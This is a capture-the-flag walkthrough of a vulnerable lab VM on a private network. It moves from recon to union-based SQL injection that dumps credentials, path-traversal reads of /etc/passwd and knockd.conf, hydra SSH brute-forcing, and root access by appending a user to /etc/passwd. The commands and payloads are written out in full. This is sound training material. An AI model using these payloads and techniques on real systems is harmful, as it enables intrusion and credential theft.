Initial foothold
- Network discovery
nmap -sn 10.0.2.27/24My target is 10.0.2.49.
2. Port scan
nmap -Pn 10.0.2.49nmap -Pn -p1000- 10.0.2.49
There’re 1 filtered port, 22 and 1 open port, 80.
3. OS and service scan
nmap -A -p22,80 10.0.2.49There’s Apache httpd 2.4.38 on port 80.
4. Vuln scan
nmap --script vuln -p22,80 10.0.2.49Nothing.
Service Enumeration
HTTP service
- Nikto scan
nikto -h http://10.0.2.49
2. Directory scan
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.49/ -x php,txt,html,sh,cgi,bak -q
3. Access HTTP site
/index.php
/display.php
/search.php -> possible SQL injection
/manage.php -> possible SQL injection
It’s funny that when I accessed session.php and logout.php. I was redirected to manage.php and had admin session.
Conclusion:
There’re two possible SQLi vulnerabilities to test in search.php and manage.php
If you do a very good reconnaissance and discover that logout.php is redirected to manage.php w/ admin session. It will save a lot of time. However, I will demonstrate how to test for SQLi starting from search.php.
Exploitation
- Supply an input
2. Intercept w/ Burp Suite
3. Send to the intruder
At the right panel -> Clear $
Double click at “test” and click “add $” at the right panel
Set up the payload. This payload is based on my experience. I already uploaded it on Github.
Here’s my Github link.
Start the attack. Here’s the result. In this case, you will see the difference in length. Let’s check it out.
Test the payload. I will use:
' or 1=1--
Here’s the result.
4. Next is to test the union query to find columns
Change the value to be:
' union select 1--Add $ on “1”
Load the payload
Here’s the GitHub link.
Start the attack, the column number is six.
Test the payload
' union select 1,2,3,4,5,6--
Succeeded!!!
5. Find the version, hostname, current database
' union select 1,@@version,@@hostname,database(),5,6--
Note it.
6. Get other databases
' union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata--I don't have any results.
Fix by change comment according from Intruder attack
I will change from:
-- to -- -Here’s the new query:
' union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata-- -Result.
Note it.
7. “Staff” schema
Get table name
' union select 1,2,3,group_concat(table_name,":"),5,6 from information_schema.tables where table_schema='Staff'-- -
Note it
Get columns
' union select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name='Users' and table_schema='Staff'-- -
Note it
Get data
' union select 1,2,group_concat(UserID,":",Username,":",Password),4,5,6 from Staff.Users-- -
Note it
Crack the hash w/ crackstation
8. “users” schema
Get tables
' union select 1,2,3,group_concat(table_name,":"),5,6 from information_schema.tables where table_schema='users'-- -
Get columns
' union select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name='UsersDetails' and table_schema='users'-- -
Get data
' union select 1,2,group_concat(id,':',username,':',password),4,5,6 from users.UserDetails-- -
View page source
Copy, organize and save it as raw.txt
Extract only usernames and save as users.txt
cat raw.txt | cut -d ":" -f2 > users.txtcat users.txt
Extract only passwords and save as passwords.txt
cat raw.txt | cut -d ":" -f3 | cut -d "," -f1 > passwords.txtcat passwords.txt
Conclusion:
This database has data structure like this:
Database -> Tables -> Columns
- Staff -> StaffDetails, Users ->UserID, Username, Password
Data:
1:admin:856f5de590ef37314e7c3bdf6f8a66dcCrack the hash -> transorbital1
- users -> UsersDetails -> id,firstname,lastname,username,password,reg_date
Data is saved as raw.txt
9. Searching for expoit in manage.php
You will see the “File does note exist” string. I bet this is a hint about LFI.
View page source, nothing much.
I will find the parameter w/ wfuzz, but first I need to intercept the page request and copy the Cookie value.
Fuzz w/ wfuzz
wfuzz -b "PHPSESSID=mfbitk09jct79hpf6i20fr3lko" -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt http://10.0.2.49/manage.php?FUZZ=index.phpYou will see that there’re much non-related strings and their length is 100.
Hide string w/ length value is 100. by supplying “--hw 100”.
wfuzz -b "PHPSESSID=mfbitk09jct79hpf6i20fr3lko" --hw 100 -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt http://10.0.2.49/manage.php?FUZZ=index.phpNothing.
Change index.php to “../../../../../etc/passwd”
wfuzz -b "PHPSESSID=mfbitk09jct79hpf6i20fr3lko" --hw 100 -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt http://10.0.2.49/manage.php?FUZZ=../../../../../../../etc/passwdNow I got the result.
Test the parameter
Comparing w/ credential from raw.txt I may use these to login, but SSH is filtered. The possibility is there’s a port-knocking function.
The typical port-knocking configuration is located in:
/etc/knockd.confSupply in w/ LFI. There’s a result.
View page source for easier sequence identification.
10. Open filtered port by using the sequence result.
for p in 7469 8475 9842; do nmap -n -v0 -Pn --max-retries 0 -p $p 10.0.2.49; done
Test SSH connection, now I can connect the SSH service.
11. Brute-forcing for the credentials.
hydra -L users.txt -P passwords.txt 10.0.2.49 ssh -t 4 -uI got 3 credentials.
Privilege Escalation
- I will start w/ janitor
ssh janitor@10.0.2.49password: Ilovepeepeels -la
Lucky me, I found a hidden directory.
cd .secrets-for-putinls -lacat passwords-found-on-post-it-notes.txt
Now I got another set of passwords.
Save it as janitor_password.txt
2. Another SSH brute-forcing.
hydra -L users.txt -P janitor_password.txt 10.0.2.49 ssh -t 4 -u
Starting from “fredf”. Login to SSH service.
ssh fredf@10.0.2.49password: B4-Tru3-001sudo -l
I can run this binary.
Test the command
sudo /opt/devstuff/dist/test/test 
Test the usage
echo "Hello World" > for_readsudo /opt/devstuff/dist/test/test for_read for_appendls -la cat for_append
Next, I will append another user w/ password in /etc/passwd
Create password
openssl passwd -1 -salt new password123
nano strings_to_appendAdd the data as shown in the screenshot.
Append /etc/passwd
sudo /opt/devstuff/dist/test/test strings_to_append /etc/passwd
Verify /etc/passwd
cat /etc/passwdNow I got “newuser”.
Login as new user
su newuserpassword: password123cd /rootls -la
Now I got the flag.
cat theflag.txt
